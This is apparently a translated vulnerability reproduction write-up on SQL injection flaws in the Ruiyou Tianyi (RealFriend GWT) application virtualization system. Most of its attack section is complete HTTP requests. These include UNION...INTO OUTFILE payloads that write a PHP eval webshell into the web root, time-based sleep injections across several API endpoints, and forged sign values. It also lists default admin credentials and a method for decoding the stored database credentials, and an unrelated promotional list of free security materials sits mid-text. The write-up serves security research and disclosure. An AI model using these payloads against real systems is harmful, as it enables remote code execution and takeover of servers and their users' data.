Vulnerability Profile
The Weibu online vulnerability team obtained the remote code execution vulnerability intelligence (0day) of Ruiyou Tianyi application virtualization system through the "X Vulnerability Reward Program". Attackers can execute arbitrary code through this vulnerability, resulting in the system being attacked and controlled. Ruiyou Tianyi application virtualization system is an application virtualization platform based on server computing architecture. It centrally deploys various application software of users to Ruiyou Tianyi service cluster, and the client can access the authorized application software on the server through WEB to realize Centralized applications, remote access, collaborative office, etc.
The vulnerability is because the unauthorized interface does not perform processing verification when receiving parameters, and there is a SQL injection vulnerability, and because mysql in the integrated environment has the permission to write files, writing to the webshell will eventually lead to code execution.
Affected version
5.x <= Ruiyou Tianyi application virtualization system (GWT System) <= 7.0.2.
Environment build
The installation package Gwt7.0.2.1.exe copied from the master is installed in the default mode, and finally
Register online to get a trial http://mop.realor.cn/TrialReg.aspx
After successful registration
The default account password on Admin/123
isthe login
The default path C:/Program Files (x86)/RealFriend/Rap Server/WebRoot
is at
Default database configuration C:\Program Files (x86)\RealFriend\Rap Server\data\Config\CasDbCnn.dat
address
The account password needs to replace # with = and base64 decoding
To help you study cybersecurity, you can receive a full set of information for free:
① Mind map of cybersecurity learning and growth path
② 60+ classic cybersecurity toolkits
③ 100+ SRC analysis reports
④ 150+ e-books on cybersecurity attack and defense techniques
⑤ The most authoritative CISSP Certification Exam Guide + Question Bank
⑥ More than 1800 pages of CTF Practical Skills Manual
⑦ Collection of the latest interview questions from network security companies (including answers)
⑧ APP Client Security Testing Guide (Android+IOS)
Vulnerability reproduction and analysis
http://192.168.222.148/RAPAgent.XGI?CMD=GetRegInfo
View version information via
In order to view the complete sql actually executed by the backend, we can use the getLastSql() method provided by the framework to get the last executed SQL statement
Inject an __IndexController.class.php__dologin
webroot/casweb/Home/Controller/IndexController.class.php:dologin
We see the SQL statement and the request routing for the function
http://www.casweb.cn.x/index.php?s=/Index/dologin/name/admin/pwd/c4ca4238a0b923820dcc509a6f75849b
Construct a data packet and print out the corresponding sql statement
Because the verification code is not enabled by default, you can directly reach the SQL statement
Because when setting up the environment, the integrated mysql environment is used, with DBA authority, so you can write content anywhere in the folder
show global variables like '%secure%';
secure_file_priv='' #Allow writing to any folder
Use the error message to get the absolute path of the project
Construct payload
POST /index.php?s=/Index/dologin/name HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 221
name=1')+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, '<?php eval($_REQUEST["cmd"]);?>' into outfile 'C:/Program Files (x86)/RealFriend/Rap Server/WebRoot/dologin.php'#
Query the account and password of the administrator user
Inject two __ConsoleExternalUploadApi.XGI
webroot/ConsoleExternalUploadApi.XGI
Get three parameters, when the three parameters are not empty, callgetfarminfo
to process
webroot/Function.XGI
webroot/Common.XGI
There is no verification of
POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
initParams=1&sign=2&key=FarmName'and sleep(5)#
Modified the code to print out the SQL command
Construct to implement injection and write to file
POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 170
Content-Type: application/x-www-form-urlencoded
initParams=1&sign=1&key=1'union select '<?php eval($_REQUEST["cmd"]);?>' into outfile 'C:/Program Files (x86)/RealFriend/Rap Server/WebRoot/ConsoleExternalUploadApi.php'#
Inject three __ConsoleExternalUploadApi.XGI__uploadAuthorizeKeyFile
POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
initParams=command_uploadAuthorizeKeyFile__user_admin'and+sleep(5)#__pwd_1&key=inner&sign=d3adb9869bd6a377fa452930d920fd10
Inject four __ConsoleExternalApi.XGI__createUser
The subsequent vulnerabilities can generally be described as the same vulnerability, but because of different parameters, they are passed to different locations. Here, only one is used as an example, and the subsequent ones will not be analyzed in detail.
We analyze from ConsoleExternalApi.XGI
Get the parameters through
Through the following code, we can get the following conclusions. When the value of $key isinner
, $keyVal is a fixed value, and the value of $sign ismd5($initparams . $keyVal);
$initparams needs to include__
to split the data, and get each parameter
Then _
split to get the value corresponding to each parameter, that is, when the incoming value is a_1__b_2, the final result is a=1&b=2
continue to analyze
When the value of the incoming cmd is createUser
, enter the corresponding branch and construct the corresponding statement to achieve injection.
POST /ConsoleExternalApi.XGI?initParams=command_createUser__user_admin__pwd_1&key=inner&sign=bd58378906794858b1f57eb272e5d84f HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 46
Content-Type: application/json
{"account":"1'or sleep(5)#",
"userPwd":"1"}
Inject five __ConsoleExternalApi.XGI__getUserDetailByAccount
POST /ConsoleExternalApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
initParams=command_getUserDetailByAccount__user_admin__account_1' or sleep(5) and '1&key=inner&sign=e24b8206a168347821a2f10aede99058